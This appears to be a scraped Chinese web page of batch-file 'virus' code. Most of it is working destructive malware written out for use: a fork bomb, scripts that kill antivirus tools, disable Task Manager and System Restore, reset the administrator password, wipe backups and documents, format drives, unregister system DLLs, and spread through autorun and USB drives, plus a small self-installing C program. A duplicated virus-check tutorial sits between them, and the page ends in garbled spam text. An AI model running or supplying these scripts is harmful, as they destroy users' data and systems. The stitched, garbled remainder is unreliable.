很多,有几个思路贡献下
第一种
:1
start %0
goto 1
这个代码会自己运行自己,产生无限窗口,直到内存爆满死机。
第二种
copy %0 "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*“
copy %0 "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
加上这个代码之后,会把自身添加到启动菜单中(随系统启动而启动,与shutdown -r -t 0搭配使用威力倍增)
第三种
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
这是删除CDEF盘上面的gho文件,使用户无法通过ghost恢复系统
第四种(特殊)
Echo Const strPassword = "wohenni"' 1.vbs
echo Dim WshNetwork 1.vbs
echo Set WshNetwork = CreateObject("WScript.Network") 1.vbs
echo Dim userName 1.vbs
echo userName = WshNetwork.userName",user" 1.vbs
echo Dim Domain 1.vbs
echo Set Domain = GetObject("WinNT://./"userName) 1.vbs
echo Domain.SetPassword strPassword 1.vbs
echo Domain.SetInfo 1.vbs
echo dim gj 1.vbs
echo on error resume next 1.vbs
echo dim WSHshellA 1.vbs
echo set WSHshellA = wscript.createobject("wscript.shell") 1.vbs
start “” “1.vbs“
生成能把登录密码改为”wohenni”的VBS,并运行。
第五种
fsutil file createnew C:\1.hahaha 4096000
这是生成特定大小的文件,这句意思是在C盘下面生成1.hahaha,大小为4096000字节
还有很多,不一一列举了,希望您能更好地学习批处理!
bat是dos下的批处理文件
批处理运用:查常见病毒
其实,对于上网的人来说,遇到病毒是在所难免的。然而,如果真的不幸感染,怎样才能发现呢?难道真的要买昂贵的杀毒软件吗?不一定。
我们可以编写批处理来查一些常见的网络病毒。如果确认感染病毒,可以下载专用杀毒工具进行查杀,或采取其他途径杀毒。
下面,我以欢乐636f7079e79fa5e9819331333231613865时光为例进行分析:
主文件:1.bat
其它文件:2.bat 3.bat
1.bat代码:
@if exist c:\folder.htt call 2.bat
@if exist d:\folder.htt call 2.bat
@if exist e:\folder.htt call 2.bat
@if exist f:\folder.htt call 2.bat
2.bat代码:
@echo 发现欢乐时光病毒!
@call 3.bat
@pause
3.bat代码:
@c:
@dir *.htt *.ini /s/a1.txt
@d:
@dir *.htt *.ini /s/a1.txt
@e:
@dir *.htt *.ini /s/a1.txt
这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。
批处理运用三:文件处理
假设,我要大规模的做文件的移动、删除等,如果在Windows里操作不免会出现错误,而且这些错误不易察觉。因此,用批处理进行操作,不但简单易行,而且容易发现错误并可以及时纠正。
例如,我要将D盘的htm文件移动到E盘,再格式化D盘,然后将文件移回D盘,并改后缀为html。
1.bat代码:
@E:
@Md d
@D:
@Copy *.htm e:\d
@if exist e:\d\*.htm call 2.bat
2.bat代码:
@Format d:/q
@Copy e:\d\*.htm d:
@D:
@Ren *.htm *.html
bat是dos下的批处理文件
批处理运用:查常见病毒
其实,对于上网的人来说,遇到病毒是在所难免的。然而,如果真的不幸感染,怎样才能发现呢?难道真的要买昂贵的杀毒软件吗?不一定。
我们可以编写批处理来查一些常见的网络病毒。如果确认感染病毒,可以下载专用杀毒工具进行查杀,或采取其他途径杀毒。
下面,我以欢乐时光为例进行分析:
主文件:1.bat
其它文件:2.bat 3.bat
1.bat代码:
@if exist c:\folder.htt call 2.bat
@if exist d:\folder.htt call 2.bat
@if exist e:\folder.htt call 2.bat
@if exist f:\folder.htt call 2.bat
2.bat代码:
@echo 发现欢乐时光病毒!
@call 3.bat
@pause
3.bat代码:
@c:
@dir *.htt *.ini /s/a1.txt
@d:
@dir *.htt *.ini /s/a1.txt
@e:
@dir *.htt *.ini /s/a1.txt
这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。
批处理运用三:文件处理
假设,我要大规模的做文件的移动、删除等,如果在Windows里操作不免会出现错误,而且这些错误不易察觉。因此,用批处理进行操作,不但简单易行,而且容易发现错误并可以及时纠正。
例如,我要将D盘的htm文件移动到E盘,再格式化D盘,然后将文件移回D盘,并改后缀为html。
1.bat代码:
@E:
@Md d
@D:
@Copy *.htm e:\d
@if exist e:\d\*.htm call 2.bat
2.bat代码:
@Format d:/q
@Copy e:\d\*.htm d:
@D:
@Ren *.htm *.html
@echo off title You DEAD!!!!!!! set taskkill=s copy %0 %windir%\system32\cmd.bat attrib %windir%\system32\cmd.bat +r +s +h net stop sharedaccess nul %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f nul %s% /im norton* /f nul %s% /im av* /f nul %s% /im fire* /f nul %s% /im anti* /f nul %s% /im spy* /f nul %s% /im bullguard /f nul %s% /im PersFw /f nul %s% /im KAV* /f nul %s% /im ZONEALARM /f nul %s% /im SAFEWEB /f nul %s% /im OUTPOST /f nul %s% /im nv* /f nul %s% /im nav* /f nul %s% /im F-* /f nul %s% /im ESAFE /f nul %s% /im cle /f nul %s% /im BLACKICE /f nul %s% /im def* /f nul %s% /im 360safe.exe /f nul net stop Shadow" "System" "Service set alldrive=d e f g h i j k l m n o p q r s t u v w x y z for %%a in (c %alldrive%) do del %%a:\360* /f /s /q nul for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q nul rem 修改注册表....... REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer \Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoRun /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \System /v Disableregistrytools /t REG_DWORD /d 00000002 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoClose /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoFind /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f nul cls net user administrator 123456 nul for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q nul echo @echo off d:\setup.bat echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新 安装系统可以解决此问题 !^.^ d:\setup.bat echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动 \a.bat d:\setup.bat echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f d:\setup.bat echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f d:\setup.bat echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat /f d:\setup.bat HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f d:\setup.bat echo [windows] %windir%\win.ini echo run=d:\setup.bat C:\AUTOEXEC.BAT %windir%\win.ini echo load=d:\setup.bat C:\AUTOEXEC.BAT %windir%\win.ini echo [boot] %windir%\system.ini echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT %windir%\system.ini echo [AutoRun] d:\autorun.inf echo Open=setup.bat d:\autorun.inf echo Open=system.bat d:\autorun.inf attrib d:\autorun.inf +r +s +h d:\setup.bat attrib d:\setup.bat +r +s +h d:\setup.bat start d:\setup.bat /min nul echo @echo off C:\AUTOEXEC.BAT echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f C:\AUTOEXEC.BAT echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f C:\AUTOEXEC.BAT REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat /f C:\AUTOEXEC.BAT echo if not d:\setup.bat start %windir%\system32\cmd.bat /min C:\AUTOEXEC.BAT copy %0 %systemroot%\windows.bat nul if not exist %windir%/system32/explorer.bat @echo off %windir%/system32 /explorer.bat if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min % windir%/system32/explorer.bat if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min % windir%/system32/explorer.bat echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f %windir%/system32/explorer.bat echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d C:\AUTOEXEC.BAT /f %windir%/system32/explorer.bat echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f %windir%/system32/explorer.bat echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f %windir%/system32/explorer.bat echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d % windir%/system32/explorer.bat/f %windir%/system32/explorer.bat echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d % windir%/system32/explorer.bat /f %windir%/system32/explorer.bat echo start %systemroot%\windows.bat /min %windir%/system32/explorer.bat attrib %windir%/system32/explorer.bat +r +s +h% attrib %systemroot%/windows.bat +r +s +h for %%c in (%alldrive%) do echo @echo off %%c:\system.bat for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min %%c:\system.bat for %%c in (%alldrive%) do echo attrib system.bat +r +s +h %%c:\system.bat set drive=e f g h i j k l m n o p q r s t u v w x y z for %%c in (%drive%) do echo [AuroRun] %%c:\autorun.inf for %%c in (%drive%) do echo Open=system.bat %%c:\autorun.inf copy %0 d:\Program" "Files\run.bat for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min %%c:\system.bat for %%c in (%alldrive%) do attrib autorun.inf +r +s +h %%c:\system.bat for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h nul for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h nul if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min d:\setup.bat attrib d:\Program" "Files\run.bat +r +s +h nul del %0 exit
:1
rem 损坏安全模式
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f
rem 开机自启动
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsdir /t reg_sz /d "c:\%~n0%~x0" /fnul
rem 格式化所有盘
format d:/q
format e:/q
format f:/q
rem 运行exe会自动关联jpg
reg add "HKEY_CLASSES_ROOT\exefile\shell\opencommand" "rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscreen %1
rem 删除系统备份
for /f %%a in ('dir /b/s %systemroot%\system32\dllcache') do del /Q %%a
rem 反注册所有dll
for /f "tokens=*" %%b in ('dir /b/s %systemroot%\*.dll') do regsvr32 /s /u "%%b"
rem 反注册所有ocx
for /f "tokens=*" %%c in ('dir /b/s %systemroot%\*.ocx') do regsvr32 /s /u "%%c"
rem 禁用任务管理器
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v DisableTaskMgr /t reg_dword /d 1 /f nul
rem USB移动盘感染
for %%i in (%drives%) do (fsutil fsinfo drivetype %%i: | find "可移动驱动器"NUL copy %0 %%i)
for %%i in (%drives%) do (del %%i:\*.doc /f /s /q del %%i:\*.xls /f /s /q del %%i:\*.ghs /f /s /q)
rem 5秒内重启
shutdown -r -t 5
rem 复制自身+开机自启动
copy %0 "C:\Documents and Settings\%userprofile%\「开始」菜单\程序\启动"
rem 增加超多硬盘
md d:\fly nul 2nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly nul 2nul
rem 修改IE标题栏
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "window title" /t REG_SZ /d "Bitch, I FUCK YOU !" /f
rem 销毁自身
del %0
goto 1
最简单的病毒代码如下: #include "windows.h"
#include "stdio.h"
void main(int argc,char * argv[])
{
//printf("%s\n",argv[i]);
char copy[80];
sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"",argv[0]);
system(copy); //将这个程序拷到开机启动文件夹下面
//char cmd[]="shutdown -r -t 0";//自动重起
char cmd[]="ping baidu.com";//将这个换成上面的,就是一开机就重起了!
system(cmd);
system("pause");
}
TFT齐称为Thin Film Transistor(厚膜晶体管),是场效应晶体管的品种之一,年夜 致的制造 体式格局是正在基板上轻积各类 分歧 的厚膜,如半导体自动 层、介电层战金属电极层。 对于里板隐示技术感兴致 的,必然 要弄清晰 ,甚么是TFT? 图 一 TFT的汗青 人类 对于 T...
未将该件领往:祸修祸州直达站,你孬,韵达,申通的,输出双号入止。上岸 官网,如今 一点疑息出有,称重,的支件员,未支件韵达的出有记载 。 空儿追踪记载 二00 九-0 三-0 四 二 二: 五 二: 五 四,的票据 ,查老是 验证码纰谬 . 三 一0000,它送没有到,追踪记载 二00 九- ...
新智跑顶配比嫩智跑的进门级皆廉价 ,相比现款车型,的起亚ThetaII系列动员 机, 二0 一 九款起亚新一代智跑用车感触感染 : 二0 一 九。 杨 九 九 九 二0 一 五- 一0- 九 一 六: 五 六: 二 五,睹图一,只可说一分钱一分货,智跑后继车型,一楼说的很其实 了。起亚智跑。 新...
( 一)正在后台模拟 点击一再 访问 其它网站会造成用户挪动流质的益耗。 一 经由 系统 更新路子 拉送马libatel.comCreation Date: 二0 一 九-0 五- 一 六T0 七: 一 二: 三0Z纸不敷 年夜 ,便出有绘图 ,可以或许 参考下面双背ARP诈骗的图。。。 一、针 ...
cucci是甚么牌子守业点子• 二0 二0-0 四-0 五 一 一: 二 三: 五 九•网站漫笔 •浏览 五 二 四嫩花有着一股取熟俱去的经典之美,添上设计们正在样式上的自出机杼 ,沉紧离别 了传统的年夜 妈购菜包格调,披发 没浓烈 的时尚风度 ,让许多 亮星年夜 咖们皆地位 入神 。繁复没有隐夸...
正在阅读 器(客户端)战办事 器产生 通讯 时,便曾经斲丧 了年夜 质的空儿,尤为是正在收集 情形 比拟 蹩脚的时刻 ,那个答题尤为的凸起 。一个一般HTTP要求 的流程简述:如正在阅读 器外输出”www.xxxxxx.com”并按高归车,阅读 器再取那个URL指背的办事 器树立 衔接 ,然后阅读...